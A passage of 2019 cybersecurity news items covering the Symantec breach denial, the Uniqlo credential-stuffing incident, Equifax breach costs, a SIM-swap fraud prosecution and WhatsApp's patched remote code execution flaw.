Symantec said it is aware of recent claims that a number of US-based antivirus companies were breached, and a spokesperson said, “We have been in contact with researchers at AdvIntel, who confirmed that Symantec (Norton) has not been impacted. We do not believe there is reason for our customers to be concerned.”

*AdvIntel admitted in a message to Computer Business Review that Fxmsp had not provided “sufficient evidence to support this allegation [that Symantec was hacked].” The company added: “We believe with a high degree of confidence that Symantec’s assessment of risks and their statement that ‘there is no reason for our [Symantec] customers to be concerned currently’ is correct.”

*Updated May 15 to include statement from CBR shared with Infosecurity by Symantec.

Over 460,000 E-Retailer User Accounts Hacked

Over 460,000 E-Retailer User Accounts Hacked

Fast Retailing Co., Asia’s largest retailer, released a statement acknowledging that hackers likely gained access to the personal information of nearly half a million Uniqlo and GU brand e-commerce portal users.

“It was confirmed on May 10, 2019 that an unauthorized login by a third party other than the customer occurred on the online store site operated by our company. Although the number of targets and the situation may change according to the progress of the future survey, we will report the facts confirmed at present and our response,” according to a translation of the company's statement.

“This fraudulent login was performed from April 23 to May 10, 2019 by the method of 'list-type account hacking (list-type attack),' and the number of accounts logged-in illegally as of the present is 461,091. We deeply apologize to our customers and stakeholders for any inconvenience or concern. We will strive to further enhance security and ensure safety so that similar events do not occur.”

Not only are the password owners at risk, but e-commerce businesses with user login pages are also at risk of being the next company to suffer a breach, according to Rami Essaid, co-founder of Distil Networks.

“Data breaches like Uniqlo create huge spikes in bot traffic on the login screens of websites, as hackers cycle through enormous lists of stolen passwords. Password dumps create a ripple effect of organizations spending precious time and resources on damage control,” Essaid said.

First there is “the massive spike in failed logins, then the access into someone else’s account before the hacker changes the password, then the account lock-out for the real user, then the customer service calls to regain access to their account. All because a username and password was stolen from a different website," Essaid continued. "While it’s important that individual web users have strong, secure logins, the onus is on the businesses to detect and block malicious bot traffic before large-scale password hacks can occur.”

Insecure web applications continue to plague e-commerce businesses because retailers limit their application security efforts and often overlook the most obvious risks and threats, said Ilia Kolochenko, founder and CEO of ImmuniWeb. “Cyber-criminals will now increasingly target retailers from developed countries within the APAC region, as Western retailers are better protected and are also suffering from an economic slowdown.

“Application security should start with a holistic inventory and risk assessment to enable well-informed decisions. Afterwards, continuous security monitoring is vital to ensure agile development processes and timely addressing of any new security and privacy issues.”

Equifax Has Spent Nearly $1.4bn on Breach Costs

Equifax Has Spent Nearly $1.4bn on Breach Costs

Equifax has incurred losses so far of over $1.35bn from a devastating 2017 breach which affected more than half of all Americans and millions of UK consumers, the firm revealed in its latest financials.

The credit agency claimed in its Q1 2019 earnings statement that the figure “related to the incident, incremental technology and data security costs, and an accrual for losses associated with legal proceedings and investigations.”

The firm has recouped the maximum possible $125m, minus $7.5m, from an insurance policy, and claims that breach costs for the rest of this year will be less than those for 2018.

However, the first three months of 2019 saw the company shell out $82.8m for “technology and data security,” $12.5 for “legal and investigative fees,” and $1.5m for product liability. The largest sum ($690m) was listed as “accrual for legal matters” related to the 2017 breach.

As well as the $786.8m listed for Q1 2019, the firm detailed $68.7m it spent in Q1 2018.

Its technology and data costs “include incremental costs to transform our technology infrastructure and improve application, network, data security, and the costs of development and launch of Lock and Alert,” it explained. These include people, services and direct product costs.

The legal costs relate to payments to lawyers and professional services companies to investigate the incident and respond to legal, government, and regulatory investigations and claims. Product liability costs relate to its paying for free credit monitoring for customers.

The latest revelations can be seen as a cautionary tale of what happens when organizations fail to implement adequate cybersecurity.

The 2017 breach itself stemmed from exploitation of a known Apache Struts 2 flaw which was left unpatched. The subsequent exfiltration of data over several months compromised highly sensitive credit and personal information on over half of all American adults (148m) and 15 million UK consumers, as well as around 20,000 Canadians.

Although the UK’s ICO fined the firm the maximum £500,000 under the old regime, Equifax could have been hit with a penalty orders of magnitude greater if the incident had occurred after May 2018, when the GDPR came into effect.

Nine Charged in $2m SIM Swap Conspiracy

Nine Charged in $2m SIM Swap Conspiracy

Nine men have been charged for their alleged role in a major SIM swapping operation designed to bypass log-in security to steal millions in cryptocurrency from their victims.

Dubbed “The Community” by investigators, the group of individuals in their teens and 20s includes six alleged cyber-criminals and three former employees of mobile phone companies who are said to have helped them.

The former are charged with conspiracy to commit wire fraud, wire fraud and aggravated identity theft, while the latter are charged with wire fraud in relation to the conspiracy.

They all hail from the US, apart from Conor Freeman, 20, of Dublin.

The SIM swapping conspiracy they are said to have been involved in will be familiar to industry watchers.

First, the group gains control of a victim’s mobile phone number, either by bribing an employee of a carrier, or posing as the victim and tricking a customer service operative into swapping the number to a SIM controlled by the group.

They then use control of the phone to unlock digital currency accounts, for example by intercepting the 2FA codes often send by SMS.

The defendants are alleged to have executed seven attacks that resulted in the theft of cryptocurrency valued at around $2.4m.

“Mobile phones today are not only a means of communication but also a means of identification,” stated US attorney Matthew Schneider. “This case should serve as a reminder to all of us to protect our personal and financial information from those who seek to steal it.”

SIM swapping cases are becoming increasingly common. Last November, a Manhattan man was charged with allegedly stealing over $1m from various business executives.

In August last year, a US entrepreneur and cryptocurrency investor filed a $223m lawsuit against AT&T after a store employee allegedly helped fraudsters steal $24m of his digital funds, in another SIM swap attack.

WhatsApp Finds and Fixes Targeted Attack Bug

WhatsApp Finds and Fixes Targeted Attack Bug

WhatsApp is urging its global users to update their app after fixing a serious remote code execution (RCE) vulnerability which was being exploited in a highly targeted attack, potentially by a nation state.

The Facebook-owned mobile comms giant, which has over 1.5 billion users, rolled out a fix on Friday for the buffer overflow vulnerability in WhatsApp VOIP stack. It claimed the flaw allowed RCE “via specially crafted series of SRTCP packets sent to a target phone number.”

In effect, this means a user could be infected with the spyware payload simply by being phoned by the attacker. They don’t even have to pick up.

“The issue affects WhatsApp for Android prior to v2.19.134, WhatsApp Business for Android prior to v2.19.44, WhatsApp for iOS prior to v2.19.51, WhatsApp Business for iOS prior to v2.19.51, WhatsApp for Windows Phone prior to v2.18.348, and WhatsApp for Tizen prior to v2.18.15,” a technical note revealed.

WhatsApp’s own security team is said to have found the bug, although it has been reported that it was initially discovered and monetized by notorious Israeli firm NSO Group, whose Pegasus spyware has been sold to governments in the past to help them monitor individuals.

The firm refused to name who it suspected, saying only that it was the work of an “advanced cyber actor,” that attacks exploiting the flaw had targeted a “select number” of users, and that it bore “all the hallmarks” of a private firm that works with governments to deliver spyware targeting mobiles.

“WhatsApp encourages people to upgrade to the latest version of our app, as well as keep their mobile operating system up-to-date, to protect against potential targeted exploits designed to compromise information stored on mobile devices,” WhatsApp said in a statement sent to Infosecurity.

For its part, NSO Group reiterated in reports that its wares are only licensed to governments for the purpose of fighting crime and terror.

Chris Boyd, Malware Intelligence Analyst at Malwarebytes, argued the findings were “enormously worrying for anyone using WhatsApp on a phone alongside sensitive information.”

“The really impressive thing here is that the WhatsApp team discovered this attack at all, given no click to install is required,” he added.

WhatsApp has briefed NGOs to share any useful information, presumably to protect citizens from countries that may have been affected, and it has informed US law enforcers.